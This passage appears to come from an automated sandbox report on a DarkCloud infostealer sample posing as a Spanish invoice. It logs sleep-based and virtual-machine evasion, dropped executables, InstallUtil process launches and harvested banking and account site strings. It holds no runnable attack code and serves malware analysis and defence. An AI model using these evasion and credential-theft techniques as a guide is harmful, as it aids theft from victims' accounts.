                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -96485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -96360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -96235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -96110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -95969s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -95766s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -95608s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -95496s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -95372s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -95025s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -94907s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -94786s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -94657s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -94532s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -94407s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -94282s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -94157s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -94032s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -93916s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -93797s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -93688s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -93579s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -93454s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -93344s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -595014s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -594884s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -594765s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -594655s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -594546s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -594437s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep count: 39 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -35971150943733603s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -100000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 7076Thread sleep count: 3083 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -99765s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -99655s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -99546s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 7076Thread sleep count: 6728 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -99437s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -99327s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -99218s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -99109s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -98999s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -98890s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -98781s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -98671s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -98561s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -98453s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -98343s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -98234s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -98124s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -98015s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -97905s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -97795s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -97687s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -97577s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -97468s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -96944s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -96824s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -96487s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -96078s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -95897s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -95755s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -95625s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -95515s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -95405s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -95296s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -95187s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -95073s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -94968s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -94859s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -94749s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -94640s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -94530s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -94421s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -94312s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -94203s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -94093s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -93984s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -93874s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -93765s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -93656s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -93546s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -93437s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -93327s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -93208s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -93015s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exe TID: 2708Thread sleep time: -92640s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exe TID: 6092Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exe TID: 7844Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 100000Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 99594Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 99383Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 98782Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 98576Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 98466Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 98297Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 98188Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 98078Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 97969Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 97860Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 97735Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 97610Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 97485Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 97360Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 97235Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 97110Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 96985Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 96860Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 96735Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 96610Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 96485Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 96360Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 96235Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 96110Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 95969Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 95766Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 95608Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 95496Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 95372Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 95025Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 94907Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 94786Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 94657Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 94532Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 94407Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 94282Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 94157Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 94032Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 93916Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 93797Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 93688Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 93579Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 93454Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 93344Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 595014Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 594884Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 594765Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 594655Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 594546Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 594437Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 100000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 99765Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 99655Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 99546Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 99437Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 99327Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 99218Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 99109Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 98999Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 98890Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 98781Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 98671Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 98561Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 98453Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 98343Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 98234Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 98124Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 98015Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 97905Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 97795Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 97687Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 97577Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 97468Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 96944Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 96824Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 96487Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 96078Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 95897Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 95755Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 95625Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 95515Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 95405Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 95296Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 95187Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 95073Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 94968Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 94859Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 94749Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 94640Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 94530Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 94421Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 94312Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 94203Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 94093Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 93984Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 93874Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 93765Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 93656Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 93546Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 93437Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 93327Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 93208Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 93015Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 92640Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeThread delayed: delay time: 922337203685477
                  Source: WebData.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                  Source: WebData.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                  Source: WebData.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                  Source: WebData.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                  Source: WebData.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                  Source: WebData.4.drBinary or memory string: outlook.office.comVMware20,11696492231s
                  Source: WebData.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                  Source: WebData.4.drBinary or memory string: AMC password management pageVMware20,11696492231
                  Source: WebData.4.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                  Source: WebData.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                  Source: InstallUtil.exe, 00000004.00000002.2549138176.0000000000EE2000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2549138176.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2547970076.00000000012D0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2547970076.0000000001326000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2547970076.000000000131B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: WebData.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                  Source: WebData.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                  Source: WebData.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                  Source: WebData.4.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                  Source: WebData.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                  Source: WebData.4.drBinary or memory string: discord.comVMware20,11696492231f
                  Source: Factura modificada____678979879.exe, 00000001.00000002.1385443181.0000000000F12000.00000004.00000020.00020000.00000000.sdmp, WrappedObject.exe, 00000008.00000002.1715825407.0000000000C52000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: InstallUtil.exe, 00000004.00000002.2547967703.0000000000E8A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                  Source: WebData.4.drBinary or memory string: global block list test formVMware20,11696492231
                  Source: WebData.4.drBinary or memory string: dev.azure.comVMware20,11696492231j
                  Source: WebData.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                  Source: WebData.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                  Source: WebData.4.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                  Source: WebData.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                  Source: WebData.4.drBinary or memory string: tasks.office.comVMware20,11696492231o
                  Source: WrappedObject.exe, 00000008.00000002.1724721626.0000000002A5D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                  Source: InstallUtil.exe, 0000000B.00000002.2547970076.00000000012B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ctivebrokers.co.inVMware20,11696492231d
                  Source: WebData.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                  Source: WrappedObject.exe, 00000008.00000002.1724721626.0000000002A5D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                  Source: WebData.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                  Source: WebData.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                  Source: WebData.4.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                  Source: WebData.4.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                  Source: WebData.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                  Source: WebData.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                  Source: WebData.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeMemory allocated: page read and write | page guardJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\WrappedObject.exe "C:\Users\user\AppData\Roaming\WrappedObject.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeQueries volume information: C:\Users\user\Desktop\Factura modificada____678979879.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeQueries volume information: C:\Users\user\AppData\Roaming\WrappedObject.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exe VolumeInformation
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected DarkCloud
                  Source: Yara matchFile source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.Factura modificada____678979879.exe.3ef3468.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.1740206396.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
